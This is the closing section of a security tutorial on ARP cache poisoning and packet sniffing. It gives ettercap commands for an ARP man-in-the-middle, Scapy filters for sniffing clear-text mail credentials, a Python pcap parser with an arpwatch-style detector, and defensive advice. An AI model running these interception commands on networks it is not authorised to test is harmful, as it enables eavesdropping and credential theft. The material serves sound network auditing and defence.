Arp Cache Poisoning and Packet Sniffing
Logging Data
If you would like to log all the packets to a file, you can use a number of different tools. One is p0f, a versatile passive OS fingerprinting and masquerade detection utility; because it never sends a packet of its own, it is well suited to quietly gathering evidence about servers, firewalls, and intrusion detection systems. Ettercap can also fingerprint hosts (identify the running operating system) with the -P finger plugin; you just need to specify an open port on the target. Once you know which operating system the target runs, you can anticipate how it will react to what you send it:
# ettercap -Tq -P finger /192.168.1.121/22
To make p0f write the packets it sees to a tcpdump-format (pcap) snapshot, use the -w option:
p0f -w dumpfile.pcap
dsniff is another tool from the dsniff collection described earlier in this article. Its -w option writes the sessions it sniffs to a savefile instead of printing them. Note that this is dsniff's own session format, read back with dsniff -r; it is not a pcap that other tools can open, so do not give it a .pcap name:
dsniff -w sessions.dsniff
Ettercap dumps captured packets to a pcap file with -w as well, here while running an ARP man-in-the-middle between the gateway and a single host:
ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.130/ -w dumpfile.pcap
It is easier, and far less intrusive, to sniff the traffic of one specific computer rather than the whole LAN segment. Poisoning every host on a busy segment routes all of its traffic through your machine, and ettercap may crash under the load.
You can then inspect the capture with Scapy (http://www.secdev.org/projects/scapy/), a powerful interactive packet manipulation program that can forge or decode packets of a wide number of protocols. You can use Scapy for tasks such as scanning, tracerouting, probing, unit tests and network discovery, and it can stand in for tools like tcpdump, tethereal and p0f. Start by typing scapy at the terminal prompt; rdpcap() loads the dump, and pdfdump() renders a single packet to a PDF (this needs the PyX library and a PDF viewer, so it only works on a graphical workstation):
$ scapy
>>> a=rdpcap("/home/cr0wn/dumpfile.pcap")
>>> a
<dumpfile.pcap: TCP:9522 UDP:2386 ICMP:15 Other:611>
>>> a[423].pdfdump(layer_shift=1)
If you want to sniff live traffic to or from one host, give Scapy the following commands:
>>> sniff(filter="tcp and host 192.168.1.131", count=50)
>>> a=_
>>> a.nsummary()
This captures the next 50 TCP packets to or from 192.168.1.131 (see Figure 1). In the interactive shell, _ holds the result of the previous command, so a=_ saves the captured packets for further work.
If you use a packet's sprintf() method, you get finer control over what is displayed, here the IP endpoints and any raw payload:
>>> pkts = sniff(prn=lambda x:x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{Raw:%Raw.load%\n}"))
You can narrow the capture to particular ports, for example 25 (SMTP) and 110 (POP3), the ports mail clients commonly use and, unless the session is wrapped in TLS, ones that carry credentials in clear text. Enter the following command in Scapy:
>>> a=sniff(filter="tcp and ( port 25 or port 110 )",
...         prn=lambda x: x.sprintf("%IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport%  %2s,TCP.flags% : %TCP.payload%"))
The preceding command sniffs TCP on ports 25 and 110 and passes each packet to an anonymous lambda function, whose sprintf() call prints the source and destination endpoints, the TCP flags and the payload.
Scapy can also graph what you are sniffing by producing a simple diagram of packet flow. The conversations() method draws a conversation graph of which hosts talked to which; it requires graphviz and ImageMagick to work. The following commands sniff on the wireless interface (wlan0), here connected to a foreign network, and then render the result graphically:
>>> a=sniff(iface="wlan0", prn=lambda x: x.summary())
>>> a.conversations()
Conclusion
ARP cache poisoning lets any computer on a local area network take up one of the most powerful attack postures in network security, the man in the middle (MITM). From that position an attacker can monitor, filter, modify and inject any traffic moving between hosts on the LAN segment, including traffic to and from the default gateway. This article identified some open source tools that you can use to test your network's susceptibility to an ARP cache MITM attack. By making yourself familiar with these tools, you can see how secure your network really is.
A good defense against these techniques is port security on your switches (in particular Dynamic ARP Inspection where the switch supports it, which drops ARP replies whose IP-to-MAC binding the switch cannot verify) together with running arpwatch (http://linuxcommand.org/man_pages/arpwatch8.html) to monitor ARP traffic on your network and alert you whenever an IP address starts answering from a new MAC address.
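The logging commands above all produce libpcap files, and the arpwatch defense just described boils down to noticing when an IP address suddenly answers from a new MAC. The following Python, an added example that is not part of the original article and does not depend on Scapy, reads such a file with the standard library alone, reproduces the TCP/UDP/ICMP/Other count that Scapy prints for rdpcap(), and runs an arpwatch-style "flip flop" check over the ARP frames in the dump. The capture it parses is constructed inline, reusing the gateway 192.168.1.1 and host 192.168.1.130 from the ettercap command above plus an assumed attacker MAC; it is not a real dump.

```python
"""Parse a libpcap dump without Scapy: summarize it rdpcap()-style and run an
arpwatch-like IP-to-MAC flip-flop check over its ARP frames.
Added example for this article, standard library only."""
import struct
from collections import Counter

ETH_IPV4, ETH_ARP = 0x0800, 0x0806
PCAP_MAGIC = 0xA1B2C3D4          # classic libpcap magic, host byte order

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def ip_str(b):
    return ".".join(str(x) for x in b)

def read_pcap(data):
    """Yield raw Ethernet frames from a classic (non-pcapng) libpcap buffer."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic == PCAP_MAGIC:
        end = "<"                 # written by a little-endian host
    elif magic == 0xD4C3B2A1:
        end = ">"                 # written by a big-endian host
    else:
        raise ValueError("not a libpcap file")
    linktype = struct.unpack_from(end + "HHiIII", data, 4)[5]
    if linktype != 1:
        raise ValueError("only Ethernet (DLT_EN10MB) dumps are handled here")
    off = 24                      # skip the 24-byte global header
    while off + 16 <= len(data):
        _ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack_from(end + "IIII", data, off)
        off += 16
        yield data[off:off + incl_len]
        off += incl_len

def classify(frame):
    """Label a frame the way Scapy's PacketList summary does: TCP/UDP/ICMP/Other."""
    if len(frame) < 34:
        return "Other"
    etype, = struct.unpack_from("!H", frame, 12)
    if etype != ETH_IPV4:
        return "Other"            # ARP, IPv6 and everything else land in Other
    proto = frame[14 + 9]         # protocol is byte 9 of the IPv4 header
    return {6: "TCP", 17: "UDP", 1: "ICMP"}.get(proto, "Other")

def summarize(data):
    """Return the counts Scapy prints as <file: TCP:n UDP:n ICMP:n Other:n>."""
    counts = Counter(classify(f) for f in read_pcap(data))
    return {k: counts.get(k, 0) for k in ("TCP", "UDP", "ICMP", "Other")}

def arp_flip_flops(data):
    """arpwatch-style check: remember the MAC each IP claims in the sender
    fields of ARP requests and replies and report every change as
    (ip, previous_mac, new_mac). A poisoner's unsolicited replies show up
    because the gateway's or victim's IP suddenly maps to a new MAC."""
    seen, alerts = {}, []
    for frame in read_pcap(data):
        if len(frame) < 42:       # 14-byte Ethernet + 28-byte ARP
            continue
        etype, = struct.unpack_from("!H", frame, 12)
        if etype != ETH_ARP:
            continue
        htype, ptype, hlen, plen, _oper = struct.unpack_from("!HHBBH", frame, 14)
        if (htype, ptype, hlen, plen) != (1, ETH_IPV4, 6, 4):
            continue              # not Ethernet/IPv4 ARP
        sha, spa = mac_str(frame[22:28]), ip_str(frame[28:32])
        if spa == "0.0.0.0":
            continue              # ARP probe: the sender claims no address
        prev = seen.get(spa)
        if prev is not None and prev != sha:
            alerts.append((spa, prev, sha))
        seen[spa] = sha
    return alerts

# --- constructed sample capture (not a real dump) -------------------------
GW_MAC, GW_IP = bytes.fromhex("00112233aa01"), bytes([192, 168, 1, 1])
HOST_MAC, HOST_IP = bytes.fromhex("00112233bb02"), bytes([192, 168, 1, 130])
ATTACKER_MAC = bytes.fromhex("deadbeef0003")   # assumed attacker address
BCAST = b"\xff" * 6

def _eth(dst, src, etype, payload):
    return dst + src + struct.pack("!H", etype) + payload

def _ipv4(src, dst, proto):
    # minimal 20-byte IPv4 header plus 8 dummy transport bytes; checksum left 0
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28, 0, 0, 64, proto, 0, src, dst) + b"\0" * 8

def _arp(oper, sha, spa, tha, tpa):
    return struct.pack("!HHBBH6s4s6s4s", 1, ETH_IPV4, 6, 4, oper, sha, spa, tha, tpa)

def build_pcap(frames):
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f
    return out

SAMPLE_PCAP = build_pcap([
    _eth(BCAST, GW_MAC, ETH_ARP, _arp(1, GW_MAC, GW_IP, b"\0" * 6, HOST_IP)),             # who-has .130
    _eth(GW_MAC, HOST_MAC, ETH_ARP, _arp(2, HOST_MAC, HOST_IP, GW_MAC, GW_IP)),           # .130 is-at host
    _eth(GW_MAC, HOST_MAC, ETH_IPV4, _ipv4(HOST_IP, GW_IP, 6)),                           # TCP
    _eth(GW_MAC, HOST_MAC, ETH_IPV4, _ipv4(HOST_IP, GW_IP, 17)),                          # UDP
    _eth(HOST_MAC, GW_MAC, ETH_IPV4, _ipv4(GW_IP, HOST_IP, 1)),                           # ICMP
    _eth(HOST_MAC, ATTACKER_MAC, ETH_ARP, _arp(2, ATTACKER_MAC, GW_IP, HOST_MAC, HOST_IP)),  # poison host
    _eth(GW_MAC, ATTACKER_MAC, ETH_ARP, _arp(2, ATTACKER_MAC, HOST_IP, GW_MAC, GW_IP)),      # poison gateway
    _eth(GW_MAC, HOST_MAC, ETH_IPV4, _ipv4(HOST_IP, GW_IP, 6)),                           # TCP, now relayed
])

if __name__ == "__main__":
    print(summarize(SAMPLE_PCAP))
    for ip, old, new in arp_flip_flops(SAMPLE_PCAP):
        print(f"flip flop: {ip} changed from {old} to {new}")
```

Pointing read_pcap() at the bytes of the ettercap or p0f dump from the commands above gives the same two views of a real capture: summarize() should agree with what Scapy prints after rdpcap(), and any entry arp_flip_flops() returns is exactly the event arpwatch would mail you about. As with arpwatch, a legitimate NIC swap or DHCP reassignment also produces a flip flop, so treat the alerts as leads to investigate rather than proof of an attack.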
One way to protect network clients that browse the web is HTTPS Everywhere (https://www.eff.org/https-everywhere) by the Electronic Frontier Foundation (EFF). It rewrites connections to supporting websites to use https instead of ordinary http, which passes information in clear text that an attacker sniffing the local segment can read. It only helps for sites that offer HTTPS in the first place, and it does nothing for the clear-text mail protocols sniffed above.
The Author
David J. Dodd holds a current Top Secret DoD Clearance and is available for consulting on various Information Assurance projects. A former US Marine with an Avionics background in Electronic Countermeasures Systems, David has given talks at the San Diego Regional Security Conference and SDISSA. He is a member of InfraGard and contributes to Securing Our eCity (http://securingourecity.org). He works for pbnetworks Inc. (http://pbnetworks.net), a service-disabled-veteran–owned business located in San Diego, CA. You can contact him by emailing dave@pbnetworks.net.